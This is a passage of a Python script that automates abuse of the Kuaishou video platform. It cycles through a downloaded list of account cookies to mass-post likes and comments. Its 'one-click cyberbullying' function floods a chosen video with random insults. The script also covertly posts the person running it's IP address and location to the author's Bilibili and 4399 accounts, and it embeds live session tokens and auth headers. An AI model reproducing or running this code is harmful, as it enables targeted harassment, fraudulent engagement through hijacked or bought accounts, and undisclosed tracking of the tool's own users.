    payloadd = f"access_key=754b2585e49d1dd723c032e020447b91CjDv_9wLbQ4jrnuANiP3bKtSY6zHvTk-ki-xy_EXFxOm_zMmrQinJgJ9YxRL-xFvbVESVjBUUmlMVFpOSWFoRHFnLThaaEswR3F0MkRUNVFwbGk1dVNmS3prbEJwU2pWdlZzS3hqYS0xbHJHeXJIVnZZYW5XaHZzYmZWRjFCaWtZRXZSSTM1eHBBIIEC&appkey=1d8b6e7d45233436&banner_url=&category=15&comment_selected=0&content=%7B%22ops%22%3A%5B%7B%22insert%22%3A%22{A}%5CnIP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%5Cn%E4%BD%8D%E7%BD%AE%EF%BC%9A{f}%5Cn%E9%93%BE%E6%8E%A5%EF%BC%9A{yull}%5Cn%E8%AF%84%E8%AE%BA%EF%BC%9A{pinll}%5Cn%22%7D%5D%7D&csrf=f7fb369cdb6bd6074a01e14134354c3d&disable_rcmd=0&image_urls=&list_id=0&media_id=&mobi_app=android&origin_image_urls=&original=0&platform=android&reprint=0&spoiler=&statistics=%7B%22appId%22%3A1%2C%22platform%22%3A3%2C%22version%22%3A%228.5.0%22%2C%22abtest%22%3A%22%22%7D&summary={A}%20IP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%20%E4%BD%8D%E7%BD%AE%EF%BC%9A{f}%20%E9%93%BE%E6%8E%A5%EF%BC%9A{yull}%20%E8%AF%84%E8%AE%BA%EF%BC%9A{pinll}&tid=1&title={pinll}&top_video_bvid=&ts=1726635775&type=3&up_reply_closed=0&w_rid=6fc16c7c7ec32532081fd6393f011554&words=18&wts=1726635776&sign=0ace845a3ce5f1c1f11517ff929e0718"
    responsed = requests.post(urld, data=payloadd, headers=headersd)
    payloada = f"gameId=&commentId=&reuid=&type=user&tid=3361448649&content={A}%0AIP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%0A%E4%BD%8D%E7%BD%AE%EF%BC%9A{ff}%0A%E9%93%BE%E6%8E%A5%EF%BC%9A{yulll}%0A%E8%AF%84%E8%AE%BA%EF%BC%9A{pinll}"
    responsea = requests.post(urla, data=payloada, headers=headersa)

    sent = 0
    with open("Cookie.txt", "r") as file:
        phone_numbers = file.readlines()
    import multiprocessing
    # 核验Cookie
    while phone_numbers:

        for sent in range(9999):

            Cookie = phone_numbers[0].strip()
            with open('Cookie.txt', 'r') as file:
                lines = file.readlines()
            num_lines = len(lines)
            zhsl = (red + str(num_lines) + redd)
            headers = {
                'User-Agent': "Mozilla/5.0 (iPad; U; CPU OS 6_0 like Mac OS X; zh-CN; iPad2)",
                'Connection': "Keep-Alive",
                'Accept-Encoding': "identity",
                'acc2ept-language': "zh-CN",
                'Charsert': "utf-8",
                'Content-Type': "application/json; charset=utf-8",
                'Cookie': Cookie
            }
            yuluoyyds = '"result":1'
            response = requests.post(url, data=payload, headers=headers)
            id_found = yuluoyyds in response.text
            Cookie9999 = re.findall('userId=(.*?); kuaishou.server.web_st', Cookie)  # 取值
            Cookie99999 = (('账号') + (blue + str(Cookie9999) + redd))
            if id_found:
                print(zhsl,(green+"/"+redd), (sent), (green +hx+ "✔评论成功") + redd, pinl)
            else:
                print(zhsl,(green+"/"+redd), (sent), (yellow + hx+"⚠️评论上限或接口已没用") + redd)
            del phone_numbers[0]
            with open("Cookie.txt", "w") as file:
                for phone in phone_numbers:
                    file.write(phone)
            processes = []
            for _ in range(1):
                p = multiprocessing.Process()
                processes.append(p)
                p.start()

                # 等待所有进程完成
            for p in processes:
                p.join()
def main_menu5():
    import requests
    import re
    import json
    import time
    import urllib.request
    import os
    bai = "\033[3m"
    hx = "\033[4m"
    red = "\033[31m"
    green = '\033[32m'
    yellow = '\033[33m'
    blue = '\033[36m'
    redd = "\033[0m"
    print(
        yellow + '脚本名称:快手刷点赞7.6\n作者:小冷' + redd)

    time_tuple = time.localtime(time.time())
    A = "{}.{}.{}『{}:{}:{}』".format(time_tuple[0], time_tuple[1], time_tuple[2], time_tuple[3], time_tuple[4],
                                    time_tuple[5])

    page = requests.get('https://www.ipip.net/ip-js/')
    ss = (page.text)
    f = re.findall('[\u4e00-\u9fa5]', ss)
    f = ''.join([i for i in f if i != ' '])

    from urllib.parse import quote
    text = f
    encoded_text = quote(text)
    f = encoded_text
    ff = (f.replace('%E4%B8%AD%E5%9B%BD', '%5B%3A513%5D'))
    from urllib.parse import quote
    text1 = A
    encoded_text1 = quote(text1)
    A = encoded_text1

    urlc = "https://api.pearktrue.cn/api/hitokoto/"
    responsec = requests.get(urlc)
    print(pink+responsec.text+redd)
    page = requests.get('https://share.weiyun.com/ZdLmWM0r')
    req = requests.get("http://txt.go.sohu.com/ip/soip")
    ip = re.findall('window.sohu_user_ip="(.*?)";', req.text)[0]
    if ip in page.text:
        print('你已被作者列入黑名单')
        exit()
    xzh = re.findall('接口数量【(.*?)】黑', page.text)  # 取值
    xzh = ''.join([i.strip('') for i in xzh])  # 去括号
    xzh = (red + xzh + redd)

    url66666 = "http://tool.pfan.cn/shorturl/restore"
    yul = input(blue+yellow+'输入作品链接：'+redd)
    yul = re.findall('https://v.kuaishou.com/(.*?) ', yul)  # 取值
    yul = ''.join([i.strip('') for i in yul])
    yul = 'https://v.kuaishou.com/' + yul
    if yul == "https://v.kuaishou.com/":
        print("输入的链接有误")
        print("提示:链接需要带文案")
        exit()
    print('链接为' + yul)
    from urllib.parse import quote
    text = yul
    encoded_text = quote(text)
    yull = encoded_text
    aaaaaaaa = 'shorturl='
    aaaaaaaaa = aaaaaaaa + yull
    payload66666 = aaaaaaaaa

    headers66666 = {
        'User-Agent': "Apache-HttpClient/UNAVAILABLE (java 1.4)",
        'Connection': "Keep-Alive",
        'Accept-Encoding': "identity",
        'Content-Type': "application/x-www-form-urlencoded"
    }

    response66666 = requests.post(url66666, data=payload66666, headers=headers66666)
    a1 = response66666.text
    a111 = re.findall('&photoId=(.*?)&', a1)  # 取值
    a222 = re.findall('&userId=(.*?)&', a1)  # 取值
    a1111 = ''.join([i.strip('') for i in a111])  # 去括号
    a2222 = ''.join([i.strip('') for i in a222])  # 去括号
    print('作者ID：' + a2222)
    print('作品ID：' + a1111)

    url = "https://www.kuaishou.com/graphql"
    payload = json.dumps({
        "operationName": "visionVideoLike",
        "variables": {
            "photoId": a1111,
            "photoAuthorId": a2222
        },
        "query": "mutation visionVideoLike($photoId: String, $photoAuthorId: String, $cancel: Int, $expTag: String) {\n  visionVideoLike(photoId: $photoId, photoAuthorId: $photoAuthorId, cancel: $cancel, expTag: $expTag) {\n    result\n    __typename\n  }\n}\n"
    })

    urla = "https://mapi.yxhapi.com/user/sns/box/android/v3.0/guestBook-send.html"

    headersa = {
        'User-Agent': "4399GameCenter/8.5.0.14(android;PERM00;12;1080x2237;WIFI;2152.1033;yyys.3849)",
        'Connection': "Keep-Alive",
        'Accept-Encoding': "gzip",
        'Content-Type': "application/x-www-form-urlencoded",
        'pauth': "3361448649%7C2234157995%7Ct3ce7n18014adbafaa96b1a00c7630c6%7C1726423874%7C10002%7C0f7a190f552694ecc8a8f3ba3b49abeb%7C2",
        'X-Yxh3': "gG.xNmMwNzk0NjY1YmE0ZN.Y",
        'mudid': "3asog2UMzP8ZhZIyB1oAB9fab",
        'zxaid': "A01-YWep7z5DqWqCuFFVRqiUu5LDd44IZcl7",
        'X-Yxh1': "gG.xNmMwNzk0NjY1YmE0ZN.Y",
        'SM-DEVICEID': "20240821151037a3634af90439cbc666c2aaa92f14ae1f019313897fbf46b1",
        'mauth': "f4eafd2406c13750f162bb2a14202fb1",
        'Mbox': "b%3DbmpONy",
        'mauthcode': "12690cd79|2c8e0d552d3f3b017edc9e4a0680fa7f|3361448649",
        'mareacode': "999999",
        'X-T': "DT0yNjQyNDQxM3w4OGY1fDcyNGE4MMcc"
    }

    from urllib.parse import quote

    payloada = f"gameId=&commentId=&reuid=&type=user&tid=3361448649&content={A}%0AIP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%0A%E4%BD%8D%E7%BD%AE%EF%BC%9A{ff}%0A%E9%93%BE%E6%8E%A5%EF%BC%9A{yull}"
    responsea = requests.post(urla, data=payloada, headers=headersa)

    sent = 0
    with open("Cookie.txt", "r") as file:
        phone_numbers = file.readlines()
    import multiprocessing
    # 核验Cookie
    while phone_numbers:

        for sent in range(9999):
            Cookie = phone_numbers[0].strip()
            with open('Cookie.txt', 'r') as file:
                lines = file.readlines()
            num_lines = len(lines)
            zhsl = (red + str(num_lines) + redd)
            headers = {
                'User-Agent': "Mozilla/5.0 (iPad; U; CPU OS 6_0 like Mac OS X; zh-CN; iPad2)",
                'Connection': "Keep-Alive",
                'Accept-Encoding': "identity",
                'accept-language': "zh-CN",
                'Charsert': "utf-8",
                'Content-Type': "application/json; charset=utf-8",
                'Cookie': Cookie
            }
            yuluoyyds = '"result":1'
            response = requests.post(url, data=payload, headers=headers)
            id_found = yuluoyyds in response.text

            Cookie9999 = re.findall('userId=(.*?); kuaishou.server.web_st', Cookie)  # 取值
            Cookie99999 = (('账号') + (blue + str(Cookie9999) + redd))
            if id_found:
                print(zhsl,(green+"/"+redd), (sent), (green +hx+ "✔点赞成功") + redd)
            else:
                print(zhsl,(green+"/"+redd), (sent), (yellow + hx+"⚠️点赞上限或接口已没用") + redd)
            del phone_numbers[0]
            with open("Cookie.txt", "w") as file:
                for phone in phone_numbers:
                    file.write(phone)
            processes = []
            for _ in range(1):
                p = multiprocessing.Process()
                processes.append(p)
                p.start()

                # 等待所有进程完成
            for p in processes:
                p.join()
                
def main_menu4():
    import requests
    import re
    import json
    import time
    import urllib.request
    import os
    bai = "\033[3m"
    hx = "\033[4m"
    red = "\033[31m"
    green = '\033[32m'
    yellow = '\033[33m'
    blue = '\033[36m'
    redd = "\033[0m"
    print(
        yellow + '脚本名称快手查询作者ID7.6\n作者：小冷' + redd)

    time_tuple = time.localtime(time.time())
    A = "{}.{}.{}『{}:{}:{}』".format(time_tuple[0], time_tuple[1], time_tuple[2], time_tuple[3], time_tuple[4],
                                    time_tuple[5])

    page = requests.get('https://www.ipip.net/ip-js/')
    ss = (page.text)
    f = re.findall('[\u4e00-\u9fa5]', ss)
    f = ''.join([i for i in f if i != ' '])

    from urllib.parse import quote
    text = f
    encoded_text = quote(text)
    f = encoded_text
    ff = (f.replace('%E4%B8%AD%E5%9B%BD', '%5B%3A513%5D'))
    from urllib.parse import quote
    text1 = A
    encoded_text1 = quote(text1)
    A = encoded_text1

    urlc = "https://api.pearktrue.cn/api/hitokoto/"
    responsec = requests.get(urlc)
    print(pink+responsec.text+redd)
    page = requests.get('https://share.weiyun.com/ZdLmWM0r')
    req = requests.get("http://txt.go.sohu.com/ip/soip")
    ip = re.findall('window.sohu_user_ip="(.*?)";', req.text)[0]
    if ip in page.text:
        print('你已被作者列入黑名单')
        exit()
    url66666 = "http://tool.pfan.cn/shorturl/restore"
    yul = input(blue+yellow+'输入作品链接：'+redd)
    yul = re.findall('https://v.kuaishou.com/(.*?) ', yul)  # 取值
    yul = ''.join([i.strip('') for i in yul])
    yul = 'https://v.kuaishou.com/' + yul
    if yul == "https://v.kuaishou.com/":
        print("输入的链接有误")
        print("提示:链接需要带文案")
        exit()
    print('链接为' + yul)

    from urllib.parse import quote
    text = yul
    encoded_text = quote(text)
    yull = encoded_text
    aaaaaaaa = 'shorturl='
    aaaaaaaaa = aaaaaaaa + yull
    payload66666 = aaaaaaaaa

    headers66666 = {
        'User-Agent': "Apache-HttpClient/UNAVAILABLE (java 1.4)",
        'Connection': "Keep-Alive",
        'Accept-Encoding': "identity",
        'Content-Type': "application/x-www-form-urlencoded"
    }

    response66666 = requests.post(url66666, data=payload66666, headers=headers66666)
    a1 = response66666.text
    a111 = re.findall('&photoId=(.*?)&', a1)  # 取值
    a222 = re.findall('&userId=(.*?)&', a1)  # 取值
    a1111 = ''.join([i.strip('') for i in a111])  # 去括号
    a2222 = ''.join([i.strip('') for i in a222])  # 去括号
    print('作者ID：' + a1111)
    print('作品ID：' + a2222)
    print(red+'请自行复制'+redd)
def main_menu8():
    import requests
    import re
    import json
    import time
    import urllib.request
    import os
    import random
    bai = "\033[3m"
    hx = "\033[4m"
    red = "\033[31m"
    green = '\033[32m'
    yellow = '\033[33m'
    darkblue = '\033[34m'
    blue = '\033[36m'
    pink = '\033[35m'
    redd = "\033[0m"
    print (yellow + '2024/11/24\n脚本名称:YU快手一键网暴7.6\n作者:@小冷\nTG频道:@TG33103\n' +redd)   
    time_tuple = time.localtime(time.time())
    A= "{}.{}.{}『{}:{}:{}』".format(time_tuple[0],time_tuple[1],time_tuple[2],time_tuple[3],time_tuple[4],time_tuple[5]) 
    page=requests.get('https://www.ipip.net/ip-js/')
    ss = (page.text)
    f = re.findall('[\u4e00-\u9fa5]', ss) 
    f=''.join([i for i in f if i !=' '])
    from urllib.parse import quote
    text = f
    encoded_text = quote(text)
    f = encoded_text
    ff=(f.replace('%E4%B8%AD%E5%9B%BD', '%5B%3A513%5D'))
    from urllib.parse import quote 
    text1 = A
    encoded_text1 = quote(text1)
    A = encoded_text1
    urlc = "https://api.pearktrue.cn/api/hitokoto/"
    responsec = requests.get(urlc)
    print(pink+responsec.text+redd)
    page=requests.get('https://share.weiyun.com/ZdLmWM0r')
    req = requests.get("http://txt.go.sohu.com/ip/soip")
    ip = re.findall('window.sohu_user_ip="(.*?)";',req.text)[0]      
    if ip in page.text:
      print('你已被作者列入黑名单')    
      exit()
    url66666 = "http://tool.pfan.cn/shorturl/restore"
    yul = input(yellow+'输入作品链接：')
    yul = re.findall('https://v.kuaishou.com/(.*?) ', yul)#取值
    yul=''.join([i.strip('') for i in yul])
    yul='https://v.kuaishou.com/'+yul
    if yul=="https://v.kuaishou.com/":
     print (blue+"输入的链接有误"+redd)
     print("提示:链接需要带文案")
     exit()
    print('链接为'+yul)
    
    from urllib.parse import quote
    text = yul
    encoded_text = quote(text)
    yull = encoded_text
    aaaaaaaa= 'shorturl='
    aaaaaaaaa=aaaaaaaa+yull
    payload66666 = aaaaaaaaa
    
    headers66666 = {
      'User-Agent': "Apache-HttpClient/UNAVAILABLE (java 1.4)",
      'Connection': "Keep-Alive",
      'Accept-Encoding': "identity",
      'Content-Type': "application/x-www-form-urlencoded"
    }
    
    response66666 = requests.post(url66666, data=payload66666, headers=headers66666)
    a1= response66666.text
    a111 = re.findall('&photoId=(.*?)&', a1)#取值
    a222 = re.findall('&userId=(.*?)&', a1)#取值
    a1111=''.join([i.strip('') for i in a111])#去括号
    a2222=''.join([i.strip('') for i in a222])#去括号
    print('作者ID：'+a1111)
    print('作品ID：'+a2222)
    url = "https://www.kuaishou.com/graphql" 
    yulll=(yul.replace('https://v.kuaishou.com/', ''))
    from urllib.parse import quote
    sent = 0
    with open("Cookie.txt", "r") as file:
         phone_numbers = file.readlines()
    import multiprocessing  
    # 核验Cookie
    while phone_numbers:
       for sent in  range (9999) : 
       
        Cookie = phone_numbers[0].strip()
        values = ['草泥马','fw','人机','勒子','SZ','赶紧虫开','W速刷@TG33103','⁶⁶⁶⁶⁶⁶     ⁶⁶   ₆₆₆₆W入侵₆₆₆₆⁶⁶⁶⁶⁶⁶W   ⁶⁶W⁶⁶⁶⁶⁶ ⁶W入侵⁶⁶W牛₆₆₆₆₆   W入侵   ⁶⁶⁶⁶⁶⁶入侵了₆₆₆₆₆₆    ₆⁶⁶⁶    ⁶⁶⁶⁶⁶⁶     ⁶⁶低调⁶⁶⁶⁶     ₆₆₆₆⁶⁶⁶⁶⁶⁶     ⁶⁶   ₆₆₆₆真的太帅了吧₆₆₆₆⁶⁶⁶⁶⁶帅⁶⁶⁶⁶⁶⁶     ⁶⁶   ₆₆₆₆入侵₆₆₆₆⁶W']
        pinl=(str(random.choice(values)))
        payload = json.dumps({
          "operationName": "visionAddComment",
          "variables": {
            "photoId": a1111,
            "content": pinl,
            "photoAuthorId": a2222
          },
          "query": "mutation visionAddComment($photoId: String, $photoAuthorId: String, $content: String, $replyToCommentId: ID, $replyTo: ID, $expTag: String) {\n  visionAddComment(photoId: $photoId, photoAuthorId: $photoAuthorId, content: $content, replyToCommentId: $replyToCommentId, replyTo: $replyTo, expTag: $expTag) {\n    result\n    commentId\n    content\n    timestamp\n    status\n    __typename\n  }\n}\n"
        })
        with open('Cookie.txt', 'r') as file:
            lines = file.readlines()
        num_lines = len(lines)
        zhsl=(red+str(num_lines)+redd)
        headers = {
          'User-Agent': "Mozilla/5.0 (iPad; U; CPU OS 6_0 like Mac OS X; zh-CN; iPad2)",
          'Connection': "Keep-Alive",
          'Accept-Encoding': "identity",
          'accept-language': "zh-CN",
          'Charsert': "utf-8",
          'Content-Type': "application/json; charset=utf-8",
          'Cookie': Cookie
        }
        yuluoyyds='"result":1'
        response = requests.post(url, data=payload, headers=headers)
        id_found = yuluoyyds in response.text
        Cookie9999=re.findall('userId=(.*?); kuaishou.server.web_st', Cookie)#取值
        Cookie99999 =(('账号')+(blue+str(Cookie9999)+redd))
        if id_found:
            print(zhsl,(green+"/"+redd), (sent), (green +hx+ "✔评论成功") + redd,pinl)
        else:
            print(zhsl,(green+"/"+redd), (sent), (yellow + hx+"⚠️评论上限或接口已没用") + redd)
        del phone_numbers[0]
        with open("Cookie.txt", "w") as file:
            for phone in phone_numbers:
                file.write(phone)
        processes = []  
        for _ in range(1):  
            p = multiprocessing.Process()  
            processes.append(p)  
            p.start()  
      
        # 等待所有进程完成  
        for p in processes:  
            p.join()
def main_menu6():
    import requests
    import webbrowser
    print(
        green + '脚本名称:快手视频解析7.6' + redd)
    def main():

        try:
            print('请使用最新复制的链接，防止解析失败')
            lj=input('输入作品链接:')
            response = requests.get('https://api.kxzjoker.cn/API/jiexi_video.php?url='+(lj))
            response.raise_for_status()
            data = response.json()
            if data.get("success"):
                video_title = data.get("data", {}).get("video_title", "未知文案")
                video_url = data.get("data", {}).get("video_url", "未知视频链接")
                image_url = data.get("data", {}).get("image_url", "未知封面链接")
                print(f"文案：{video_title}")
                print(f"视频链接：{video_url}")
                print(f"封面链接：{image_url}")
                iiii=''.join([i.strip('') for i in video_url])
                iiiii=''.join([i.strip('') for i in video_url])
                print(iiii)
                zz=input('输入[1]跳转视频链接/[2]跳转封面链接')
                if  zz == "1":
                  url= iiii
                  webbrowser.open_new(url)
             
                elif  zz == "2":
                  url= iiiii
                  webbrowser.open_new(url)
            
                return video_title, video_url, image_url
            else:
                print("解析失败：", data.get("message"))
                return None, None, None
        except requests.RequestException as e:
            print(f"请求失败：{e}")
            return None, None, None

    if __name__ == "__main__":
        main()
     
    
def main_daoru():
    import os
    import requests
    import re
    import json
    import time
    import urllib.request
    import os
    bai = "\033[3m"
    hx = "\033[4m"
    red = "\033[31m"
    green = '\033[32m'
    yellow = '\033[33m'
    darkblue = '\033[34m'
    blue = '\033[36m'
    pink = '\033[35m'
    redd = "\033[0m"
    print(blue+'远程更新接口技术由小冷提供'+redd)
    page=requests.get('https://share.weiyun.com/frH3aJWy')
    jk1 = re.findall('接口链接1【(.*?)】', page.text)#取值
    jk1=''.join([i.strip('') for i in jk1])#去括号
    jk2 = re.findall('接口链接2【(.*?)】', page.text)#取值
    jk2=''.join([i.strip('') for i in jk2])#去括号
    jk3 = re.findall('接口链接3【(.*?)】', page.text)#取值
    jk3=''.join([i.strip('') for i in jk3])#去括号
    jk4 = re.findall('接口链接4【(.*?)】', page.text)#取值
    jk4=''.join([i.strip('') for i in jk4])#去括号
    jk5 = re.findall('接口链接5【(.*?)】', page.text)#取值
    jk5=''.join([i.strip('') for i in jk5])#去括号
    xzh = re.findall('接口数量【(.*?)】', page.text)#取值
    xzh=''.join([i.strip('') for i in xzh])#去括号
    xzh =(red+xzh+redd)
    
    
    nian=('https://share.weiyun.com/frH3aJWy')
    if os.path.exists('Cookie.txt'):
        print()
    else:
        print('接口文件不存在')
        filename = 'Cookie.txt'
        print('正在下载资源(请等待5-20s)')
        print('默认下载线路1接口')
        urllib.request.urlretrieve(jk1, filename)
    with open('Cookie.txt', 'r') as file:
        lines = file.readlines()
    num_lines = len(lines)
    zhsl=(red+str(num_lines)+redd)
    zhsll=(red+xzh+redd)
    print(yellow+"接口现数量:"+redd,zhsl)
    print(yellow+"接口总数量:"+redd,zhsll)
    if zhsl != zhsll:
     
     sfdr =input(red+'是否重新导入接口(是:y/否:n):'+redd)
     if sfdr=='y':
       print(pink+'[1]:线路一'+redd)
       print(pink+'[2]:线路二'+redd)
       print(pink+'[3]:线路三'+redd)
       print(pink+'[4]:线路四'+redd)
       xl =input(yellow+'选择导入的线路(输入:1或2或3或4或5):'+redd)
       if xl=='1':
        page=requests.get('https://share.weiyun.com/frH3aJWy')
        if '线路1开关状态【关】' in page.text:      
         print('线路状态：',(red + '维护'+ redd))      
         exit()
        else:
        
         filename = 'Cookie.txt'
         print(pink+'正在下载线路1接口，请稍等(约5s-20s)'+redd)
         urllib.request.urlretrieve(jk1, filename)
         with open('Cookie.txt', 'r') as file:
             lines = file.readlines()
         num_lines = len(lines)
         zhsl=(red+str(num_lines)+redd)
         print(bai+'接口导入成功，现接口为:'+redd,zhsl)
       elif xl=='2':
        page=requests.get('https://share.weiyun.com/frH3aJWy')
        if '线路2开关状态【关】' in page.text:      
         print('线路状态：',(red + '维护'+ redd))      
         exit()
        else:
        
         filename = 'Cookie.txt'
         print(pink+'正在下载线路2接口，请稍等(约5s-20s)'+redd)
         urllib.request.urlretrieve(jk2, filename)
         with open('Cookie.txt', 'r') as file:
             lines = file.readlines()
         num_lines = len(lines)
         zhsl=(red+str(num_lines)+redd)
         print(bai+'接口导入成功，现接口为:'+redd,zhsl)
       elif xl=='3':
        page=requests.get('https://share.weiyun.com/frH3aJWy')
        if '线路3开关状态【关】' in page.text:      
         print('线路状态：',(red + '维护'+ redd))      
         exit()
        else:
        
         filename = 'Cookie.txt'
         print(pink+'正在下载线路3接口，请稍等(约5s-20s)'+redd)
         urllib.request.urlretrieve(jk3, filename)
         with open('Cookie.txt', 'r') as file:
             lines = file.readlines()
         num_lines = len(lines)
         zhsl=(red+str(num_lines)+redd)
         print(bai+'接口导入成功，现接口为:'+redd,zhsl)
       elif xl=='4':
        nian1=input(yellow+hx+'输入精选接口卡密：')
        length = len(nian1)
        if length<15:
          print('卡密无效')
          exit()
        if '线路4开关状态【关】' in page.text:      
           print('线路状态：',(red + '维护'+ redd))      
           exit()
        else:
            filename = 'Cookie.txt'
            print('正在下载精选接口，请稍等(约5s-20s)')
            urllib.request.urlretrieve(nian+nian1, filename)
            with open('Cookie.txt', 'r') as file:
                lines = file.readlines()
            num_lines = len(lines)
            zhsl=(red+str(num_lines)+redd)
            print(bai+'接口导入成功，现接口为:'+redd,zhsl)
     else:
        print(hx+blue+'继续使用剩余接口'+redd)
def main_menu2():
    page=requests.get('https://share.weiyun.com/frH3aJWy')
    if '卡密开关状态【开】' in page.text:
      print(yellow+'[1]刷关注'+redd)
      print(darkblue+'[2]刷评论'+redd)
      print(pink+'[3]刷点赞'+redd)
      print(blue+'[4]一键网暴'+redd)
      print(red+'[5]查询ID'+redd)
      print(green+'[6]视频解析'+redd)
      xuanz=input(yellow+hx+'选择使用的功能1/2/3/4：')
      if xuanz=="1":
       main_daoru()      
       Login1 = input(hx+darkblue+'跳过即可'+redd) 
       Login(Login1,'72862')
      elif xuanz=="2":
       main_daoru()      
       Login1 = input(hx+darkblue+'跳过即可'+redd) 
       Login3(Login1,'72862')
      elif xuanz=="3":
       main_daoru()      
       Login1 = input(hx+darkblue+'跳过即可'+redd) 
       Login5(Login1,'72862')
      elif xuanz=="4":
       main_daoru()      
       Login1 = input(hx+darkblue+'跳过即可'+redd) 
       Login8(Login1,'72862')
      elif xuanz=="5":
       main_daoru()      
       Login1 = input(hx+darkblue+'跳过即可'+redd) 
       Login4(Login1,'72862')
      elif xuanz=="6":
       main_daoru()      
       Login1 = input(hx+darkblue+'跳过即可'+redd) 
       Login6(Login1,'72862')
      else:
       print("SZ，赶紧重开")
    else:
      YULUO_KSQIANDAO()
    for i in range(1000000):
        sum += i
    end_time = time.time()
    print("程序执行了%f秒"%(end_time - start_time))
    
if __name__ == "__main__":
    CheckUpData()
    Notice()
    Login1 = input(yellow+hx+'请输入卡密：') 
    Login2(Login1,'72862'+redd)